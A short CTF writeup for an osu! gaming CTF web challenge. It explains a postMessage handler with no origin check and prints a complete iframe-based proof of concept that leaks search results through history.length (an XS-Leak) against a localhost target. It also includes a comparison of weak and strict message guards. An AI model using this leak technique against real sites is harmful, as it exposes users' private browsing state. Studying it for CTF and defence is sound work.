[Osu! gaming CTF] beatmap list Writeup
프레딕
2025. 10. 28. 01:09
At first I saw this line:
if (e.origin !== window.origin && data.identifier !== identifier) return;
so I assumed it was the bypass from https://ahmed-tarek.gitbook.io/security-notes/pentesting/wep-pen/owsap-top-10/software-and-data-integrity-failures/postmessage-vulnerabilities/bypassing-sop-with-iframes-part-1, but it wasn't.
It was simpler than that: engine.js, the script loaded by engine.html, has no such check at all, so the guard is bypassed and you just hammer /engine.html with postMessage.
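As an added illustration (not code from the writeup or the challenge), here is the guard quoted above modelled as a pure predicate next to a hardened form, so the two boolean shapes can be compared offline in Node. Note that the writeup's actual path was a frame with no guard at all; this only shows why the quoted line, with &&, drops a message only when both conditions fail. The origins, the identifier value and the event/payload objects are constructed for the example and are not from the challenge.

```javascript
// Added example, not the writeup's code. `ev`, `data` and `ctx` are plain
// objects standing in for the MessageEvent, its parsed payload and the
// receiving window's own origin/identifier. All values are constructed.

// The guard as quoted from the challenge: a message is dropped only when
// BOTH the origin differs AND the identifier differs.
function weakGuardDrops(ev, data, ctx) {
  return ev.origin !== ctx.windowOrigin && data.identifier !== ctx.identifier;
}

// Hardened form: drop when EITHER check fails.
function strictGuardDrops(ev, data, ctx) {
  return ev.origin !== ctx.windowOrigin || data.identifier !== ctx.identifier;
}

// True when the message handler would continue past the guard.
function handlerRuns(guardDrops, ev, data, ctx) {
  return !guardDrops(ev, data, ctx);
}

// Constructed receiver context (hypothetical origin and identifier).
const ctx = { windowOrigin: 'http://localhost:8000', identifier: 'abc123' };

// Constructed messages covering every combination of origin/identifier match.
const cases = [
  { name: 'same origin, right id',  ev: { origin: 'http://localhost:8000' }, data: { identifier: 'abc123' } },
  { name: 'cross origin, right id', ev: { origin: 'http://evil.example' },   data: { identifier: 'abc123' } },
  { name: 'same origin, wrong id',  ev: { origin: 'http://localhost:8000' }, data: { identifier: 'zzz' } },
  { name: 'cross origin, wrong id', ev: { origin: 'http://evil.example' },   data: { identifier: 'zzz' } },
];

// Run every constructed message through both guards.
function compareGuards() {
  return cases.map(c => ({
    name: c.name,
    weak: handlerRuns(weakGuardDrops, c.ev, c.data, ctx),
    strict: handlerRuns(strictGuardDrops, c.ev, c.data, ctx),
  }));
}

for (const r of compareGuards()) {
  console.log(r.name.padEnd(24), 'weak guard runs handler:', r.weak, '| strict:', r.strict);
}
```

With the && form, a cross-origin sender that knows (or guesses) the identifier, or a same-origin sender with any identifier, gets through; only the || form restricts the handler to messages that satisfy both checks.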
<!DOCTYPE html>
<html>
<head>
  <title>SOP Bypass Test</title>
</head>
<body>
  <p>Check console for logs...</p>
  <script>
    // Build the attack page inside an srcdoc iframe
    const f = document.createElement('iframe');
    f.srcdoc = `
      <!DOCTYPE html>
      <html>
      <body>
        <h2>Malicious iframe (origin: null)</h2>
        <script>
          const sleep = d => new Promise(r => setTimeout(r, d));
          const tryChar = async () => {
            // Open the target; w1[0] is its first child frame, i.e. the engine iframe
            const w1 = open('http://localhost:8000', '_blank');
            await sleep(500);
            // engine.js has no origin/identifier check, so any sender is accepted
            w1[0].postMessage({
              type: "search",
              query: "svg"
            }, '*');
            await sleep(500);
            // Navigate the opened window to about:blank so its history becomes readable
            w1.location = "about:blank";
            await sleep(500);
            // history.length is the leak: it differs depending on what the search did
            let a = w1.history.length;
            await sleep(500);
            return a;
          }
          (async () => {
            alert(await tryChar());
          })();
        <\/script>
      <\/body>
      <\/html>
    `;
    document.body.appendChild(f);
  </script>
</body>
</html>
In short, it is a history.length XS-Leak, and w1[0] means posting to the first iframe inside the w1 window.
I should read more PoC code and practice writing JS.